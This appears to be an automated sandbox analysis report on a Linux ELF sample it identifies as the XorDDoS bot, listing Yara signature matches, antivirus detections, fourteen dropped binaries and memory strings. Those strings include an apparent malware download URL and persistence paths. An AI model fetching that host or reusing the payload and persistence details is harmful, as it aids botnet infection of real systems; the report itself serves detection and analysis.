Process Memory Space: dptxrnhxmx.elf PID: 6357	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6357	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6359	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6359	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6362	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6362	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xccf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xdac:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6365	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6365	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31b5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3292:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6371	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6371	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3551:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x362e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6374	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6374	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3656:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3733:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6377	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6377	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3343:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3420:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6380	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6380	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3551:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x362e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6383	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6383	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3663:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3740:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6388	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6388	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3337:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3414:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6391	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6391	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d8b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e68:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6394	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6394	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6397	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6397	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6400	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6400	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6406	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6406	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6409	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6409	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x365c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3739:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6414	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6414	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2e96:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2f73:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6417	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6417	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 382 entries

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dptxrnhxmx.elf

Avira: detected

Found malware configuration

Source: dptxrnhxmx.elf

Malware Configuration Extractor: XorDDoS {"C2 list": []}

Multi AV Scanner detection for submitted file

Source: dptxrnhxmx.elf	ReversingLabs: Detection: 78%
Source: dptxrnhxmx.elf	Virustotal: Detection: 74%			Perma Link

Antivirus detection for dropped file

Source: /usr/bin/doxgrgkpoa	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/tqdlzqtrvv	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/gcfolkfaec	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/mntlutgnfs	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/lib/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/rhlqbltizb	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/tgdthymawi	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/drdxrfohux	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zfzhrlhjxr	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/scllcnzpeu	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wobaryykiz	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/mbeioyodii	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/qabtuykfdb	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wrvptdarnp	Avira: detection malicious, Label: LINUX/Xorddos.cona

Machine Learning detection for dropped file

Source: /usr/bin/doxgrgkpoa	Joe Sandbox ML: detected
Source: /usr/bin/tqdlzqtrvv	Joe Sandbox ML: detected
Source: /usr/bin/gcfolkfaec	Joe Sandbox ML: detected
Source: /usr/bin/mntlutgnfs	Joe Sandbox ML: detected
Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/rhlqbltizb	Joe Sandbox ML: detected
Source: /usr/bin/tgdthymawi	Joe Sandbox ML: detected
Source: /usr/bin/drdxrfohux	Joe Sandbox ML: detected
Source: /usr/bin/zfzhrlhjxr	Joe Sandbox ML: detected
Source: /usr/bin/scllcnzpeu	Joe Sandbox ML: detected
Source: /usr/bin/wobaryykiz	Joe Sandbox ML: detected
Source: /usr/bin/mbeioyodii	Joe Sandbox ML: detected
Source: /usr/bin/qabtuykfdb	Joe Sandbox ML: detected
Source: /usr/bin/wrvptdarnp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: dptxrnhxmx.elf

Joe Sandbox ML: detected

Source: /tmp/dptxrnhxmx.elf (PID: 6209)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: dptxrnhxmx.elf, doxgrgkpoa.11.dr, tqdlzqtrvv.11.dr, gcfolkfaec.11.dr, mntlutgnfs.11.dr, libudev.so.11.dr, rhlqbltizb.11.dr, tgdthymawi.11.dr, drdxrfohux.11.dr, zfzhrlhjxr.11.dr, scllcnzpeu.11.dr, wobaryykiz.11.dr, mbeioyodii.11.dr, qabtuykfdb.11.dr, wrvptdarnp.11.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html
Source: dptxrnhxmx.elf, 6208.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6210.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6211.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6212.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6243.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6246.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6248.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6251.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6254.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6298.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6301.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6304.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6307.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6309.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6316.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6319.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6322.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6325.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6327.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6337.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6340.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar
Source: dptxrnhxmx.elf, 6208.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6210.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6211.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6212.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
Source: dptxrnhxmx.elf, 6371.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6374.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6377.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6380.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6383.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gc
Source: dptxrnhxmx.elf, 6316.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6319.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6322.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6325.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6327.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mb
Source: dptxrnhxmx.elf, 6243.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6246.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6248.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6251.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6254.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qa
Source: dptxrnhxmx.elf, 6354.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6357.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6359.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6362.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6365.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rh
Source: dptxrnhxmx.elf, 6388.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6391.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6394.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6397.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6400.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9sc
Source: dptxrnhxmx.elf, 6406.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6409.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6414.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tg
Source: dptxrnhxmx.elf, 6337.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6340.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6343.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6346.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6348.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wo
Source: dptxrnhxmx.elf, 6298.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6301.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6304.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6307.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp, dptxrnhxmx.elf, 6309.1.00000000ffeb6000.00000000ffed7000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: dptxrnhxmx.elf, type: SAMPLE
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6210.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6397.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6394.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6365.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6304.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6212.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6211.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6319.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6243.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6343.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6210, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6211, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6243, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6246, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6251, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6254, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6301, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6307, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6309, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6319, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6322, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6325, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6327, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6337, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6343, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6346, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6354, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6357, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6359, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6362, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6365, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6371, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6374, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6377, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6383, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6391, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6394, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6397, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6409, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6414, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dptxrnhxmx.elf PID: 6417, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/qabtuykfdb, type: DROPPED
Source: Yara match	File source: /usr/bin/tqdlzqtrvv, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/rhlqbltizb, type: DROPPED
Source: Yara match	File source: /usr/bin/wrvptdarnp, type: DROPPED
Source: Yara match	File source: /usr/bin/mntlutgnfs, type: DROPPED
Source: Yara match	File source: /usr/bin/scllcnzpeu, type: DROPPED
Source: Yara match	File source: /usr/bin/wobaryykiz, type: DROPPED
Source: Yara match	File source: /usr/bin/zfzhrlhjxr, type: DROPPED
Source: Yara match	File source: /usr/bin/tgdthymawi, type: DROPPED
Source: Yara match	File source: /usr/bin/gcfolkfaec, type: DROPPED
Source: Yara match	File source: /usr/bin/mbeioyodii, type: DROPPED
Source: Yara match	File source: /usr/bin/drdxrfohux, type: DROPPED
Source: Yara match	File source: /usr/bin/doxgrgkpoa, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
